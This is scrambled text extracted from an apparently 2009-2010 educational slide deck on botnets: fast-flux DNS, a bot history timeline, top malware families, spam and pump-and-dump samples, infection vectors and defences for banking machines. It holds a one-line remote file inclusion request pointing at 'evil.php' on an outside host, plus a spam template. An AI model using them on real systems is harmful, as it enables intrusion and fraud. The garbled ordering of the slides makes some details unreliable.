Escolar Documentos
Profissional Documentos
Cultura Documentos
A Presentation
For
IDC
2010
Copyright Craig Schiller, 2010. This work is the intellectual property of the author.
Permission is granted for this material to be shared for non-commercial, educational
purposes, provided that this copyright statement appears on the reproduced
materials and notice is given that the copying is by permission of the author. To
disseminate otherwise or to republish requires written permission from the author.
12/08/21 ©
© 2008
2009 Craig
Craig A
A Schiller
Schiller AOD - 2
Handbook Against the AOD
12/08/21 ©
© 2008
2009 Craig
Craig A
A Schiller
Schiller AOD - 3
Agenda
•Botnet Overview
•Botnet Schemes
•How Do They Get In?
•What Can We Do?
•Concluding Thoughts
• Multi-homed DNS
– FQDN maps to 3 or more IP addresses
botnet1.example.com pointing to 127.0.0.1
botnet1.example.com pointing to 127.0.0.2
botnet1.example.com pointing to 127.0.0.3
botnet1.example.com pointing to 127.0.0.4
botnet1.example.com pointing to 127.0.0.5
botnet1.example.com pointing to 127.0.0.6
– Dynamic DNS used thru commercial site
– Change IP addresses quickly
• Short DNS TTLs for clients
– Remap DNS often, check at boot
• FastFlux DNS
– Change IP addresses and/or DNS names quickly
(for spam < 5 minutes) and often
12/08/21 © 2009 Craig A Schiller AOD - 7
Hiding the C&C Server or Phishing Website
The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the
earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.
Microsoft Senior Security Manager says Botnets are the biggest threat of 2007
Vincent Cerf, founder of the Internet, tells global finance conference that 1/4th of
all computers belong to botnets.
Norman Elton and Matt Keel from the College of William & Mary, in a 2005
presentation, called bot networks “the single greatest threat facing humanity.”
John Macanan, in “The Evolution of Malicious IRC Bots,” says that Botnets are
“the most dangerous and widespread Win32 viral threat.
Microsoft reports that of the 5.7 million unique Windows systems from which
the MSRT removed malware, 62% were found to have a Trojan or bot client.
Ryan Narraine, a writer for e-week, said that botnets are “the key hub for well
organized crime rings around the globe, using stolen bandwidth from drone
zombies to make money from nefarious Internet activity.”
C&C
Traditional Botnet
IRC protocol
C&C
Terminal Services
IRC protocol
VNC
Bot Bot
RDP
Carbon copy
Remote BackOrifice
controlled SubSeven
clients
Now, many include the systems that execute commands of the botherder even if the
malicious code is not present. These systems are remotely controlled. They would
be considered bot clients if they were part of a “net” of remotely controlled clients,
even if the “bot” mechanism is somewhere else.
12/08/21 © 2009 Craig A Schiller AOD - 12
Command & Control Today
2003
2002 SpyBot
SDBot, written in C++ Spyware capabilities
Source code Available (keylogging,
to hacker community data mining for email addresses 2004
Small, single binary Lists of URLs,etc) PolyBot
1988 1999
Pretty Park discovered A derivative of AgoBot with
Invention of IRC Polymorphic abilty. Changes it’s the
first worm to use an IRC server
as a means of remote control look of its code on every infection
1989 1990 1991 1992 1993 1994 1995 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006
1988 2006
2005
1989 MYTOB
Greg Lindahl invents GM the first Bot, My Doom
GM plays “Hunt the Wumpus” with IRC users 1999 mass emailing worm
SubSeven trojan/bot 2002 with Bot IRC C&C
A remote control trojan 2003
AgoBot, Gaobot
added control via IRC Introduces modular design RBot
2000 Most Prevalent Bot today
GT Bot, mIRC based 1st module breaks-in
Spreads through
Runs scripts in response to downloads 2nd module weak passwords,
IRC server events 2nd module turns off anti-virus easilty modifieable,
Supports raw TCP and UDP Hides from detection,
downloads 3rd module Uses packaging software
Socket connections
Module 3 has attack
engines/payload Page 1
$$
.
11/21/07
Ref: Bizeul.org -
RBN
OINVEST
SPB IX
DELTASYS
INFOBOX
DATAPOINT
Retrieve the
Payload module Adaptive
Report Result to
the C&C Channel
Listen to the C&C
Server/Peer for Targetable
commands
Execute the
commands
On Command,
Erase all evidence
and abandon the
client
12/08/21 © 2009 Craig A Schiller AOD - 24
Botnet Client communication
No. 1: Zeus aka Z-bot; Financial Trojan, keystroke logger, MITB 3.6M
No. 2: Koobface Social engineering, trojaned codec, Bot client 2.9M
No. 3: TidServ Trojaned spam attachment rootkit see #4 1.5M
No. 4: Trojan.Fakeavalert Social engineering delivery vehicle 1.4M
No. 5: TR/Dldr.Agent.JKH Remote Control Trojan sends encrypted
data to C&C. Clikbot 1.2 M
No. 6: Monkif Middleware attempts to downloadadware BHO .5M
No. 7: Hamweq aka IRC Brute or an autorun worm, downloader .48M
No. 8: Swizzor – Trojan dropper Installs adware .37M
No. 9: Gammima aka , Gamania, Frethog, Vaklik and Krap, steals online
game account info, rootkit, spreads on USB .23M
No. 10: Conficker aka Downadup Propgates 4 ways .21M
12/08/21 © 2009 Craig A Schiller AOD - 26
2009 Top 10 Malware Families
Koobface
Zeus
Tidserv
Monkif
Conficker
Vundo
Swizzor
Hamweq
Sinowal
Matcash
3 Arrested 12.7M
(http://www.barracudacentral.org/index.cgi?p=spam)
%TO_CC_DEFAULT_HANDLER
Subject: %SUBJECT
Sender: "%FROM_NAME" <%FROM_EMAIL>
Mime-Version: 1.0
Content-Type: text/html
Date: %CURRENT_DATE_TIME
%MESSAGE_BODY
12/08/21 © 2009 Craig A Schiller AOD - 32
Pump & Dump Stocks
Making Dollars and Sense Now is The Time!
SymboL: PSCP
Current Price: $0.35
5 Day Target price: 1.75
Action: Aggresive Buy
But, of course, “Once you have paid him the Dane-geld, you never get rid of the Dane.”
Dane-geld, by Rudyard Kipling (A.D. 980-1016 )
• Phishing attacks
• Pharming attacks
Botnet Client
Sends spam
12/08/21 © 2009 Craig A Schiller AOD - 41
How do they get in?
We are a trading company that is into the hire, sales and service of Electrical
Trucks, Fork Trucks and associated materials handling equipments and diverse
range of battery for electric vehicles which can be readily adapted for customers
specific requirements to the America and selected locations in Europe.
1. Get /a.php?vuln=http://webhost.com/evil.php
Target.com
Attacker
Webhost.com
http://www.wired.com/politics/security/news/2007/11/mac_trojan
Best Bot left the A/V tray icon and a fake GUI
Botnet Sensors
Botnet Sensors
Security Researcher
Wormwatch mailing list
Re-image computer
Security Team
Identify computer or user
Nanog • Phishing
• http://
Castlecops.com www.whitestar.linuxbox.org/mailman/listinfo/phishing
• Vendor
MIRT
PIRT ISC Storm Center
APWG
http://www.bleedingthreats.net/fwrules/
Separate machine(s) used SOLELY for institutional online banking operations (and used for
all such operations) is STRONGLY RECOMMENDED. Useful technical and policy controls
include:
Referencing the The Irretrievable Losses of Malware-Enabled ACH and Wire Fraud:
+ Don't make the machine part of a Windows domain. Administer
the machine using a local administrator account.
+ Shut the machine down when not in use.
+ Implement very aggressive firewall and possibly proxy
protections for the system. All non-banking traffic should
be denied.
+ Aggressively monitor traffic to and from the system
+ Place the machine on a separate VLAN, on a secure dedicated
hard-wired network connection.
•Botnet Overview
•Botnet Schemes
•How Do They Get In?
•What Can We Do?
•Concluding Thoughts
Questions?